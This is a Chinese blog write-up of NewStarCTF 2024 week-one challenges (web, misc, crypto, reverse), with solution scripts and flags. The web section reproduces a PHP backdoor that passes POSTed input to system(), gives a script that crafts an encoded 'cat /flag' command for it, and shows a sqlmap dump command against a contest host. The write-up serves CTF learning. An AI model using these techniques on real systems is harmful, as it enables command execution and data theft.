2024-NewStarCTF-WEEK1

于 2024-10-10 21:21:41 发布
阅读量307 收藏 9
点赞数 17
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80185313/article/details/142832594
版权

web

headach3

提示head,抓包查看响应头,得到flag

flag值:flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

会赢吗

第一段:源码里找到第一段flag,ZmxhZ3tXQTB3

第二段:分析可知需要在控制台调用revealFlag函数向服务器发送POST请求到 /api/flag/4cqu1siti0n,得到第二段flag IV95NF9yM2Fs

revealFlag('4cqu1siti0n');

第三段:修改stateElement参数内容为解封,点击按钮触发事件得到flag,MXlfR3I0c1B

document.getElementById('state').textContent = '解封';

第四段:用插件禁用js,得到最后一段flag,fSkpKcyF9

四段拼接起来,base64解码,得到flag

flag值:flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}

智械危机

题目提示robots.txt,访问发现一个php界面

源码如下,代码审计后门php

<?php

  function execute_cmd($cmd) {
  system($cmd);
  }

  function decrypt_request($cmd, $key) {
    $decoded_key = base64_decode($key);
    $reversed_cmd = '';
    for ($i = strlen($cmd) - 1; $i >= 0; $i--) {
      $reversed_cmd .= $cmd[$i];
    }
    $hashed_reversed_cmd = md5($reversed_cmd);
    if ($hashed_reversed_cmd !== $decoded_key) {
      die("Invalid key");
    }
    $decrypted_cmd = base64_decode($cmd);
    return $decrypted_cmd;
  }

if (isset($_POST['cmd']) && isset($_POST['key'])) {
  execute_cmd(decrypt_request($_POST['cmd'],$_POST['key']));
}
else {
  highlight_file(__FILE__);
}
?>

加密流程是:post提交cmd和key,base解码key,cmd反转,md5加密的反转cmd等于解码后的key,最后将cmd解码

按照给出的逻辑,逆向加密一下,得到flag,脚本如下

import base64
import hashlib

def encode(cmd):
    encoded_cmd = base64.b64encode(cmd.encode()).decode()
    reversed_cmd = encoded_cmd[::-1]
    md5_cmd = hashlib.md5(reversed_cmd.encode()).hexdigest()
    key = base64.b64encode(md5_cmd.encode()).decode()
    return encoded_cmd, key

cmd = "cat /flag"
encoded_cmd, key = encode(cmd)
print(f"cmd={encoded_cmd}&key={key}")

flag值: flag{26f0ff62-c087-468c-821d-06f519977e22}

谢谢皮蛋

输入不同的id得到不同的结果,可以确定是sql注入了

抓包可以看到参数被base64编码了,刚好前两天学了sqlmap的使用,直接试试sqlmap的tamper模块

使用--tamper=base64encode.py对输入的参数进行base64编码,一键脱库,得到flag

python sqlmap.py http://eci-2zeb4o4fzbdh0lzlc9h2.cloudeci1.ichunqiu.com/ --data="id=1" --tamper=base64encode.py --dump

flag值:flag{e60a762a-b153-41b5-b041-4f2b403414ab}

Misc

decompress

压缩包套娃,一直解到最后一层,将文件提取出来

提示给出了一个正则,按照正则爆破密码,一共五位,第四位是数字

^([a-z]){3}\d[a-z]$

无所谓,一共就五位数,懒得写脚本了,直接ARCHPR爆破,得到密码 xtr4m,解压得到flag

flag值:flag{U_R_th3_ma5ter_0f_dec0mpress}

pleasingMusic

使用Audacity打开,中间是一段摩斯密码,提示倒着手动敲出来,得到flag

. --.. ..--.- -- --- .-. ... . ..--.- -.-. --- -.. .

摩斯解码得到flag

flag值:flag{ez_morse_code}

WhereIsFlag

慢慢翻,最后在环境变量里找到flag

flag值:flag{9e7a4f9f-ce98-4b87-8cd0-a61ca73083b3}

Labyrinth

使用StegSlove翻到一张二维码,扫码得到flag

flag值:flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43}

兑换码

随波逐流爆破出高度,得到flag

flag值:flag{La_vaguelette}

Crypto

xor

将flag1和flag2重新与key异或回去,写解密脚本

from Crypto.Util.number import long_to_bytes
from pwn import xor

c1 = 8091799978721254458294926060841
c2 = b';:\x1c1<\x03>*\x10\x11u;'
key = b'New_Star_CTF'

key_int = int.from_bytes(key, 'big')

flag1 = long_to_bytes(c1 ^ key_int)
flag2 = xor(key, c2)

print(flag1 + flag2)

# flag{0ops!_you_know_XOR!}

flag值:flag{0ops!_you_know_XOR!}

Base

cyberchef一把梭

flag值:flag{B@sE_0f_CrYpt0_N0W}

一眼秒了

在线网站分解n,然后是正常的rsa解密

from Crypto.Util.number import inverse, long_to_bytes

c = 48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069
p = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421
q = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093
e = 65537
n = p * q

phi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c, d, n)
flag = long_to_bytes(m)

print(flag.decode())

# flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

flag值:flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

Strange King

根据题目名称结合密文特征,想到是凯撒偏移密码,枚举,偏移量为5时开头是f

fnem{ZxsqkyZmNqxYbybZuslelg}

根据提示猜测可能是然后每个字符依次移位,写脚本得到flag

str_encrypted = "fnem{ZxsqkyZmNqxYbybZuslelg}"

str_decrypted = ""
for i, word in enumerate(str_encrypted):
    n = -(i * 2)
    if word == "{":
        word_decrypted = "{"
    elif word == "}":
        word_decrypted = "}"
    elif word.islower():
        word_decrypted = chr((ord(word) - ord("a") + n) % 26 + ord("a"))
    elif word.isupper():
        word_decrypted = chr((ord(word) - ord("A") + n) % 26 + ord("A"))
    else:
        word_decrypted = word
    str_decrypted += word_decrypted

print("明文为:", str_decrypted)

flag值:flag{PleaseDoNotStopLearing}

Reverse

begin

考察IDA的使用

找到flag1,按a键将数据转化为可见字符

shift+F12,找到字符串,点开就能看到flag2和flag3

得到flag:flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse}

base64

换表base64,找到flag和base表

cyberchef解码得到flag

flag值:flag{y0u_kn0w_base64_well}

Simple_encryption

简单的算法题,AI写个脚本得到flag

# 定义 buffer 的值
buffer = bytearray([
    0x47, 0x95, 0x34, 0x48, 0xA4, 0x1C, 0x35, 0x88, 0x64, 0x16, 0x88,
    0x07, 0x14, 0x6A, 0x39, 0x12, 0xA2, 0x0A, 0x37, 0x5C, 0x07, 0x5A,
    0x56, 0x60, 0x12, 0x76, 0x25, 0x12, 0x8E, 0x28, 0x00, 0x00  # 最后两个0是填充
])


def reverse_transform(buffer):
    original = bytearray(len(buffer))
    for j in range(len(buffer)):
        value = buffer[j]
        if j % 3 == 2:
            # 反转 XOR 操作
            value ^= 0x55
        elif j % 3 == 1:
            # 反转加法操作
            value -= 41
        else:  # j % 3 == 0
            # 反转减法操作
            value += 31

        # 确保值在合法的字节范围内
        value = value & 0xFF  # 保证值在0到255之间

        original[j] = value
    return original


# 逆向变换得到原始输入
original_input = reverse_transform(buffer)

# 将字节数组转换为可读的字符串
print("Original input should be:", original_input.decode('latin-1', errors='replace'))

# flag{IT_15_R3Al1y_V3Ry-51Mp1e}

flag值:flag{IT_15_R3Al1y_V3Ry-51Mp1e}

Liebert77
关注
NewStarCTF2024-week1-wp
2303_79553403的博客
10-07 1120
原文链接:https://www.n0o0b.com/archives/newstarctf2024-week1-wp。
NewStarCTF 2024 公开赛道 Week1
2401_85238540的博客
07-20 1401
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
BUUCTF-NewStarCTF 2023 公开赛道 WEEK2[WEB]游戏高手
qq_68581192的博客
10-13 475
输入gameScore=9999999999(数值大于它最开始的要求的数值就行),回车。先右键点击检查,点击Sources,将gameScore复制到Console控制台。我们直接碰到其他飞机,让游戏结束,点击一次确定之后,就会弹出flag。回到原来的游戏界面,继续玩,会发现成绩已经超过所要求的。
NewStarCTF2024-week1-所有WP(勇师傅版)
Welcome To Myon'Blog !
10-08 923
第一周的题比较简单所以 ak 了,勇师傅也就新生赛能体会下全栈的感觉,实则菜鸡一枚哈哈哈,要学的东西还多,慢慢来吧,路漫漫其修远兮,吾将上下而求索。
BUUCTF-NewStarCTF 2023 公开赛道 WEEK2[WEB]include 0。0
qq_68581192的博客
10-14 52
发现有flag.php,且发现base等被过滤了,利用php伪协议,再通过利用iconv将utf-8编码转为utf-7编码,读取flag.php,构造payload。利用utf-7在线转换,得出flag。
NewStarCTF2022-Week4-Web
bossDDYY的博客
10-18 1142
**写在前面**:本人小白,文章有什么错误,欢迎各位师傅指点 本文有些地方借鉴Pysnow师傅的wp[Pysnow师傅的wp](https://pysnow.cn/archives/453/) # So Baby RCE > 考点:空格绕过、关键字符绕过、斜杠绕过 ## 分析 打开题目,发现直接给的源码 ```php
NewStarCTF WEEK1-MISC
CharlieSuee的博客
10-18 318
这题看了很久也写不出来,最后看了其他人的wp发现是要用silenteye解码获得flag,记小本本!使用wireshark打开文件,看到有很多http流,也有tcp流,尝试导出http对象看看。使用010Editor打开这个无后缀文件,发现应该是一个zip文件。提示解压错误,使用bandizip的修复功能修复一下这个压缩包。whitespace,在线编译一下,获得flag。又是base编码,使用cyberchef解码。有点像flag,使用记事本打开看看。使用密码打开压缩包,获得flag。
NewStarCTF 2023 week5--web
pwfortune的博客
07-12 1074
比如别人读取的文件, 应该是要有个docker然后再是后面的数字啊, 有点懵,感觉应该是环境变了。却没有反应,啥也没有,不知道为啥,看别人的博客应该是可以的。不管前面的反序列化,直接利用 php://input ,猜测路径为var/www/html。不晓得为啥1.php就是无法执行命令, 蚁剑也连不上,可能哪里出问题了 哎,太菜了。网上搜到的一个, 但是用不了,可能具体的版本不一样,尝试使它报错,得到具体的版本情况。离谱了,之前都还行,现在环境又不行了 , 一样的参数, 我真服了, 重启也不行。
NewStarCTF 2023 Week1 MISC-wp
wobushilijiatu的博客
01-12 472
我们得到一个流量包 发现很多http流量 我们过滤一下发现有很多状态码为404的错误 我们在过滤一下发现一串字符串 有点像base编码 解码两次得到flagbase解码 套了3层base编码。
leetcode分类-Algorithm-Practice-EveryWeek:Algorithm-Practice-EveryWeek-算法
06-30
Algorithm-Practice-EveryWeek-算法更新每周 详细记录见 算法练习记录-天 目录 刷题时建议按类型刷题,参考刷题类型分类 同时已经这样在刷题的参考 2019Year 2019-07-06 更新TopN算法 参考文章见算法总结 2019-07-21...
react-week-events:一个React.js响应式周历来显示事件
04-28
npm install --save react-week-events yarn add react-week-events 用法 import React , { Component } from 'react' import WeekCalendar from 'react-week-events' import 'react-week-calendar/dist/styles.css'...
22-23Winter_Week3-1.ipynb
12-12
22-23Winter_Week3-1.ipynb
web-basics-2-week-1-Rossana900:web-basics-2-week-1-Rossana900由GitHub Classroom创建
02-14
网络基础知识2:第1周的作业 该作业将涵盖以下JavaScript主题: 在终端中执行代码 使用变量存储和跟踪信息 ... cd web-basics-2-week-1-[your-username] 创建一个新的本地分支以与主分支( master )分
web-basics-2-week-1-lena-aiu:web-basics-2-week-1-lena-aiu由GitHub Classroom创建
02-14
网络基础知识2:第1周的作业 该作业将涵盖以下JavaScript主题: 在终端中执行代码 使用变量存储和跟踪信息 ... cd web-basics-2-week-1-[your-username] 创建一个新的本地分支以与主分支( master )分
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8493
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真 功能:实现并联系统中各逆变器输出
最新发布
10-09
多台三相逆变器并联(本模型为三台并联,市面上多为两台并联)matlab simulink仿真。 功能:实现并联系统中各逆变器输出功率均分。 (有能力的话还可以研究下垂特性、功率指令以及静态功工作点三者之间的联系) 控制策略:VSG控制策略(同步机控制) 逆变器主电路:三相逆变器,LCL滤波电路,VSG控制模块。 VSG控制模块:定、转子方程,dq变,电压电流双闭环,预同步,pwm发生器。
Ringtones波点音乐-《Lightning Moment》.mp3
10-09
Ringtones波点音乐-《Lightning Moment》.mp3
onnx2onnx-0.3.1.tar.gz
10-09
onnx2onnx-0.3.1.tar
postgresql 将2024-03-03转为周时间范围
09-26
在PostgreSQL中,你可以使用`EXTRACT`函数和`DATE_TRUNC`函数来将日期转换为周范围。首先,假设你想获取从某一天开始到该周结束的时间范围,包括周日,可以按照以下步骤操作: 1. 确定给定日期是周几: ```sql SELECT EXTRACT(WEEK FROM '2024-03-03'); ``` 这会返回'2024-03-03'所在的星期编号。 2. 计算开始和结束周日期: - 开始周日期是给定日期减去天数得到周一(如果给定的是周日,则不需要调整) - 结束周日期是开始周日期加上6天(因为一周有7天) 示例: ```sql WITH start_week AS ( SELECT DATE_TRUNC('week', '2024-03-03') - INTERVAL 'EXTRACT(DAYOFWEEK FROM '2024-03-03') - 1 DAY' AS week_start ) SELECT week_start, week_start + INTERVAL '6 days' - INTERVAL '1 second' AS week_end FROM start_week; ``` 这将返回2024年3月3日所在那一周的具体日期范围。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值